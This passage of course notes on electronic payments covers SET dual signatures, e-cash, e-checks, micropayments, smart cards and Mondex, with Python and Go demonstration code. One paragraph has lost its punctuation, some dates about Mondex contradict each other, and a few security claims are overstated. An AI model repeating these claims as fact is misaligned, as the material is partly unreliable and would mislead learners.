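PI = b"pan=XXXX-TEST-CARD;exp=01/30;amount=49.00;merchant=bookshop"


def demo() -> tuple:
    """Sign once, verify at both parties, then show that altering OI breaks the link."""
    ds = dual_signature(OI, PI)
    merchant_ok = merchant_verify(OI, H(PI), ds)                               # True
    gateway_ok = gateway_verify(PI, H(OI), ds)                                 # True
    # A merchant who inflates the order amount can no longer match the cardholder's DS.
    tampered_ok = merchant_verify(OI.replace(b"49.00", b"4900.00"), H(PI), ds)  # False
    return merchant_ok, gateway_ok, tampered_ok


if __name__ == "__main__":
    print(demo())
```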

DIGITAL ENVELOPE (figure)

SET PROTOCOL

The SET protocol has four phases: initiation, purchase, authorization and capture.

1. First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.
2. In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.
3. In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.
4. Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

• Issuers
• Customers
• Merchants or traders
• Regulators

Issuers can be banks or non-bank institutions.

Customers are the users who spend e-cash. Merchants and traders are vendors who receive e-cash. Regulators are the related authorities or state tax agencies.

For an e-cash transaction to occur, we need to go through at least three stages:

• Account setup: customers will need to obtain e-cash accounts through certain issuers. Merchants who would like to accept e-cash will also need to arrange accounts with various e-cash issuers. Issuers typically handle accounting for customers and merchants.
• Purchase: customers purchase certain goods or services and give the merchants tokens which represent equivalent e-cash. Purchase information is usually encrypted when transmitted over the network.
• Authentication: merchants will need to contact e-cash issuers about the purchase and the amount of e-cash involved. E-cash issuers will then authenticate the transaction and approve the amount of e-cash involved.

E-cash payment system

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works (figure).

This is a simple model of the e-cash payment system. It gives us the idea of how the e-cash payment system works; the model is explained below.

The customer approaches his issuer's (bank's) site for accessing his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant for acquiring services, for which the customer authenticates the payment for the trader.

In the third phase, the trader approaches the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank converts the tokens into electronic funds, and the same are transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

E-cash is a system that allows a person to pay for goods or services by transmitting a number from one computer to another. Like the serial numbers on real currency notes, the e-cash numbers are unique. Each is issued by a bank and represents a specified sum of real money.

It is anonymous and reusable.

Electronic Cash Security

• Complex cryptographic algorithms prevent double spending.
• Anonymity is preserved unless double spending is attempted.
• Serial numbers can allow tracing to prevent money laundering.
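To make the issue/spend/redeem model above and the double-spending check concrete, the following added example (not code from the original notes) lets an issuer mint serial-numbered tokens against a customer balance and redeem them for a trader, refusing altered tokens and any serial presented twice. It assumes an issuer-held HMAC key (a constructed value here) in place of the blind-signature scheme that gives real e-cash its anonymity, so the anonymity property is not modelled.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass

# Constructed issuer key for the demo; a real issuer would keep it in an HSM.
ISSUER_KEY = b"constructed-demo-issuer-key"


@dataclass(frozen=True)
class Token:
    """One e-cash token: a unique serial (like a banknote number), a value, and the
    issuer's authentication tag binding the two together."""
    serial: str
    value: int
    tag: str


class Issuer:
    """The issuing bank: mints tokens against a customer balance and redeems them for
    merchants, refusing forged tokens and any serial it has already converted to funds."""

    def __init__(self, key: bytes):
        self._key = key
        self._accounts = {}        # account name -> balance in whole currency units
        self._redeemed = set()     # serials already turned into funds

    def open_account(self, name: str, balance: int) -> None:
        self._accounts[name] = balance

    def balance(self, name: str) -> int:
        return self._accounts.get(name, 0)

    def _tag(self, serial: str, value: int) -> str:
        # HMAC over (serial, value): only the issuer can mint, and a changed value
        # or serial will not verify.
        msg = f"{serial}:{value}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def withdraw(self, customer: str, amount: int, denomination: int = 10) -> list:
        """Stage 1 (account access / issue): debit the customer and mint tokens."""
        if amount % denomination or self.balance(customer) < amount:
            raise ValueError("bad denomination or insufficient funds")
        self._accounts[customer] -= amount
        tokens = []
        for _ in range(amount // denomination):
            serial = secrets.token_hex(8)   # unique, unpredictable serial number
            tokens.append(Token(serial, denomination, self._tag(serial, denomination)))
        return tokens

    def redeem(self, merchant: str, token: Token) -> str:
        """Stage 3 (authentication): the trader presents a token; the issuer checks the
        tag, then the serial, and only then converts it into funds."""
        if not hmac.compare_digest(token.tag, self._tag(token.serial, token.value)):
            return "REJECTED: forged or altered token"
        if token.serial in self._redeemed:
            return "REJECTED: double spend"
        self._redeemed.add(token.serial)
        self._accounts[merchant] = self.balance(merchant) + token.value
        return "APPROVED"


def run_demo() -> tuple:
    """Walk the three stages and the two failure modes the issuer must catch."""
    bank = Issuer(ISSUER_KEY)
    bank.open_account("customer", 100)
    bank.open_account("trader", 0)
    tokens = bank.withdraw("customer", 30)          # three 10-unit tokens; balance now 70
    first = bank.redeem("trader", tokens[0])        # "APPROVED"
    again = bank.redeem("trader", tokens[0])        # same serial twice -> double spend
    altered = Token(tokens[1].serial, 100, tokens[1].tag)   # value changed, tag no longer matches
    forged = bank.redeem("trader", altered)
    return first, again, forged, bank.balance("customer"), bank.balance("trader")


if __name__ == "__main__":
    print(run_demo())
```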

E-Cash Processing (figure)

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password or anything similar is involved. It is simply an online fund transfer from the customer's account to the trader's account.

However, while accessing the customer's account, the customer must keep in mind Internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security, keeping the website link on the safe "https" protocol, and using proper Internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

• We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.
• Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.
• E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges; that is why very low payments are not charged a fee.

Limitations

• However secure the e-cash payment system is, still no one is safe against online frauds. In this case the trader is the fraudulent party: the trader may take the amount but not provide the services.
• While making the payment it is very important that the Internet connection and power supply remain active. If the payment is in process and the Internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.
• E-cash is not for everyone. Low-income segments without computer and Internet access are unable to enjoy the usage of e-cash.

The rise of e-cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income group readiness and technology reliability issues will make e-cash more perfect. Countries such as India, where people were hesitant to use such methods, have shown tremendous use of online payments and the e-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.

E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.

Reaping the benefits of eChecks

Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Digital signatures, usually issued together with digital certificates, transform data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They are used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they are a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical value used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here is how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data, and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize an electronic debit and to enter the bank routing number (ABA) and account number.

2. The merchant's sales system securely transfers the order information to CyberSource over the Internet.

3. CyberSource forwards the bank routing number and account number to the processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.

5. CyberSource returns the approval/decline message to the merchant.

6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
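The validation and authentication steps above, as an added worked example that is not part of the original notes or of any CyberSource or NACHA software: a Go program in which a processor checks the ABA routing-number check digit (step 4), verifies the payer's digital signature over the check (the public-key authentication described under "Protecting your business"; Ed25519 from Go's standard library stands in for whatever scheme a real bank uses), and refuses a second presentment of the same check, which is the duplicate detection listed there. The ECheck fields, the account and routing values and the processor API are constructed for this example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// ECheck is the record the payer's software signs and the merchant forwards
// (steps 2-3). Field names are this example's own assumptions.
type ECheck struct {
	CheckNumber string
	Routing     string // 9-digit ABA routing transit number
	Account     string
	AmountCents int64
	Payee       string
}

// canonical is a fixed serialization so signer and verifier hash the same
// bytes; the duplicate detector keys on a hash of it as well.
func (c ECheck) canonical() []byte {
	return []byte(fmt.Sprintf("%s|%s|%s|%d|%s",
		c.CheckNumber, c.Routing, c.Account, c.AmountCents, c.Payee))
}

func (c ECheck) fingerprint() string {
	sum := sha256.Sum256(c.canonical())
	return hex.EncodeToString(sum[:])
}

// ValidRouting applies the ABA check-digit rule used in step 4:
// 3*(d1+d4+d7) + 7*(d2+d5+d8) + (d3+d6+d9) must be a multiple of 10.
func ValidRouting(r string) bool {
	if len(r) != 9 {
		return false
	}
	weights := [9]int{3, 7, 1, 3, 7, 1, 3, 7, 1}
	sum := 0
	for i := 0; i < 9; i++ {
		if r[i] < '0' || r[i] > '9' {
			return false
		}
		sum += weights[i] * int(r[i]-'0')
	}
	return sum%10 == 0
}

// Processor plays the processor's part in steps 3-4: it holds the public key
// registered for each account and remembers every check already settled.
type Processor struct {
	payerKeys map[string]ed25519.PublicKey
	seen      map[string]bool
}

func NewProcessor() *Processor {
	return &Processor{payerKeys: map[string]ed25519.PublicKey{}, seen: map[string]bool{}}
}

func (p *Processor) Register(account string, pub ed25519.PublicKey) {
	p.payerKeys[account] = pub
}

// Decide returns "APPROVED" or a decline reason (the approve/decline result
// of step 4). The signature check precedes the duplicate check so that a
// forged record is never recorded as seen.
func (p *Processor) Decide(c ECheck, sig []byte) string {
	if !ValidRouting(c.Routing) {
		return "DECLINED: bad routing number"
	}
	pub, ok := p.payerKeys[c.Account]
	if !ok {
		return "DECLINED: unknown account"
	}
	if !ed25519.Verify(pub, c.canonical(), sig) {
		return "DECLINED: signature invalid"
	}
	fp := c.fingerprint()
	if p.seen[fp] {
		return "DECLINED: duplicate presentment"
	}
	p.seen[fp] = true
	return "APPROVED"
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	proc := NewProcessor()
	proc.Register("123456789012", pub) // constructed sample account
	// Constructed sample check; the routing value satisfies the check-digit rule.
	chk := ECheck{"1001", "021000021", "123456789012", 4999, "Example Merchant"}
	sig := ed25519.Sign(priv, chk.canonical())
	fmt.Println(proc.Decide(chk, sig)) // first presentment
	fmt.Println(proc.Decide(chk, sig)) // same check presented again
	altered := chk
	altered.AmountCents = 499900 // amount changed after signing
	fmt.Println(proc.Decide(altered, sig))
}
```

The canonical serialization matters more than it looks: if signer and verifier serialize the record differently, every signature fails, and if the fingerprint omits a field, two different checks can be wrongly treated as duplicates.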

Four Different Scenarios of the FSTC E-check System -

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment/credit based)
PayWord (post-payment)

MICROPAYMENT IS -

Very small payments made over the Web
Transactions too small for credit cards
Can be as little as a fraction of a cent
An alternative to subscription and advertising
Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here is one scheme for micropayments. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.
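The accumulate-then-collect pattern just described, as an added example that is not from the original notes: a Go program using the hash-chain construction that PayWord (named earlier as a post-payment scheme) is known for. The user publishes a root w_0 = H^n(w_n) to the vendor; each one-cent payment reveals the next preimage, which the vendor checks with a single hash against the last one accepted, so per-payment verification costs far less than a card authorization. Accepted cents accumulate per user and are only passed on for settlement once a threshold is reached. The seed, user names, threshold and the Vendor API are constructed for this example, and PayWord's signed commitment and broker are omitted.

```go
package main

import (
	"crypto/sha256"
	"fmt"
)

// H is the one-way function of the chain (SHA-256 here).
func H(b [32]byte) [32]byte { return sha256.Sum256(b[:]) }

// NewChain builds w_0..w_n from a secret seed w_n: w_i = H(w_{i+1}).
// The user keeps the chain and releases w_1, w_2, ... in order.
func NewChain(seed [32]byte, n int) (root [32]byte, chain [][32]byte) {
	chain = make([][32]byte, n+1)
	chain[n] = seed
	for i := n - 1; i >= 0; i-- {
		chain[i] = H(chain[i+1])
	}
	return chain[0], chain
}

// Vendor is the seller-side account: per user it tracks the last payword
// accepted and the cents accrued since the last settlement batch.
type Vendor struct {
	last      map[string][32]byte
	accrued   map[string]int
	threshold int      // cents to accumulate before one larger collection
	settled   []string // "user:cents" batches handed to the provider/broker
}

func NewVendor(threshold int) *Vendor {
	return &Vendor{last: map[string][32]byte{}, accrued: map[string]int{}, threshold: threshold}
}

// Register stores the user's commitment (root) when the account is set up.
func (v *Vendor) Register(user string, root [32]byte) { v.last[user] = root }

// Accept verifies H(w) == previously accepted payword. A replayed, skipped
// or unknown-user payword fails; on success the chain advances one cent and
// a settlement batch is emitted when the threshold is reached.
func (v *Vendor) Accept(user string, w [32]byte) bool {
	prev, ok := v.last[user]
	if !ok || H(w) != prev {
		return false
	}
	v.last[user] = w
	v.accrued[user]++
	if v.accrued[user] >= v.threshold {
		v.settled = append(v.settled, fmt.Sprintf("%s:%d", user, v.accrued[user]))
		v.accrued[user] = 0
	}
	return true
}

// Settlements returns the batched collections made so far.
func (v *Vendor) Settlements() []string { return v.settled }

func main() {
	var seed [32]byte
	copy(seed[:], "constructed-secret-seed-for-demo") // constructed 32-byte seed
	root, chain := NewChain(seed, 5)
	v := NewVendor(3)
	v.Register("alice", root)
	for i := 1; i <= 5; i++ {
		fmt.Println("payment", i, "accepted:", v.Accept("alice", chain[i]))
	}
	fmt.Println("replayed payword accepted:", v.Accept("alice", chain[2]))
	fmt.Println("settlement batches:", v.Settlements())
}
```

The vendor never learns w_6 or beyond, so it cannot charge more than the user has actually released, and the provider receives one collection per batch instead of one per cent; a production verifier would also accept w_{i+k} by hashing k times to credit k cents at once.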

Advantages and risks -

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer side in using micropayments are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small amounts, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before seeing a return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options -

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer then gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and Mastercard SecureCode™).

Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses -

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized with a microchip embedded on it

Two types:
  Memory-only chips
  Microprocessor chips

Can hold up to 32000 bytes

Newer smart cards have math co-processors

Perform complex encryption routines quickly

In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards -

Why Smart Cards -

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages -

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card

Smart card Processing

Smart Card Applications -

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned for the SF Bay Area system

Authentication ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks etc

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support multiple currencies

ADVANTAGES

CONSUMER -

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

MERCHANT -

Reliable off-line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION -

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? -

Principles protected
 o limits for collecting personal information
 o limits for using, disclosing and keeping personal information
 o keeping personal information accurate
 o safeguarding personal information

Limits for collecting personal information
 o loads from account
 o deposits into account
 o lost transactions

Limits for using, disclosing and keeping personal information
 o safeguard deposits
 o to reimburse for non-performance

Keeping personal information accurate
 o load and unload are online
 o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information
 o firewalls in Multos between applications - ITSEC E6 designation
 o transaction data to retailer is deliberately limited
 o individual transaction data is not collected by banks - Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. Mondex cards, however, contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are actually recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions are not truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you cannot purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you are protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable: there is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex cannot claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of the limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
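The card behaviour described in this section (card-to-card transfer without going online, a lock-card function, and a transaction log that overflows after a fixed number of entries), as an added example that is not Mondex's own code or design: a Go model of a purse holding a balance, a PIN lock and a ten-entry ring buffer, the size chosen to match the "rolling 10 transactions" figure in the privacy section. Running it shows that after twelve payments only the last ten records survive to the next upload, which is the data loss the critics refer to. Card ids, PINs, amounts and the Purse API are constructed for this example.

```go
package main

import (
	"errors"
	"fmt"
)

const logSize = 10 // records the card retains between uploads (assumed)

// Txn is one entry of the card's own transaction record.
type Txn struct {
	Seq          int
	Counterparty string // id of the other card
	Amount       int    // cents; negative means value paid out
}

// Purse is the value-carrying application on the card.
type Purse struct {
	ID       string
	balance  int
	pin      string
	locked   bool
	nextSeq  int
	log      [logSize]Txn
	logCount int
	dropped  int // records overwritten before any upload could retrieve them
}

func NewPurse(id, pin string, balance int) *Purse {
	return &Purse{ID: id, pin: pin, balance: balance}
}

func (p *Purse) Balance() int { return p.balance }

// Lock and Unlock implement the "lock card" function; a locked card cannot pay.
func (p *Purse) Lock() { p.locked = true }

func (p *Purse) Unlock(pin string) bool {
	if pin == p.pin {
		p.locked = false
	}
	return !p.locked
}

// record appends to the ring buffer; once full, the oldest entry is lost.
func (p *Purse) record(t Txn) {
	if p.logCount == logSize {
		p.dropped++ // overflow: history is gone before the bank ever sees it
	} else {
		p.logCount++
	}
	p.log[t.Seq%logSize] = t
}

// Transfer moves value directly from one card to another with no bank
// online. The payer is debited before the payee is credited and the two
// amounts are equal, so no value is created or destroyed.
func Transfer(from, to *Purse, amount int) error {
	if amount <= 0 {
		return errors.New("amount must be positive")
	}
	if from.locked {
		return errors.New("payer card is locked")
	}
	if from.balance < amount {
		return errors.New("insufficient value on card")
	}
	from.balance -= amount
	from.record(Txn{from.nextSeq, to.ID, -amount})
	from.nextSeq++
	to.balance += amount
	to.record(Txn{to.nextSeq, from.ID, amount})
	to.nextSeq++
	return nil
}

// Upload hands the retained records to the bank (as at an ATM or retailer
// upload), oldest first, and reports how many were already overwritten.
func (p *Purse) Upload() (records []Txn, lost int) {
	for i := 0; i < p.logCount; i++ {
		records = append(records, p.log[(p.nextSeq-p.logCount+i)%logSize])
	}
	lost, p.dropped = p.dropped, 0
	return records, lost
}

func main() {
	alice := NewPurse("card-A", "1234", 2000) // constructed sample cards
	bob := NewPurse("card-B", "9999", 0)
	for i := 0; i < 12; i++ {
		if err := Transfer(alice, bob, 100); err != nil {
			fmt.Println("rejected:", err)
		}
	}
	alice.Lock()
	fmt.Println("transfer from locked card:", Transfer(alice, bob, 100))
	recs, lost := alice.Upload()
	fmt.Printf("alice %d, bob %d, %d records retained, %d lost before upload\n",
		alice.Balance(), bob.Balance(), len(recs), lost)
}
```

Conservation of value (the debit and credit are the same amount, applied inside one operation) is the property an offline purse depends on; the ring buffer shows why a fixed-size log cannot make such a system "fully auditable", since the bank only ever sees what was still on the card at upload time.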

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance -

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this as the definition of e-governance is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state-wide area networks in these states.

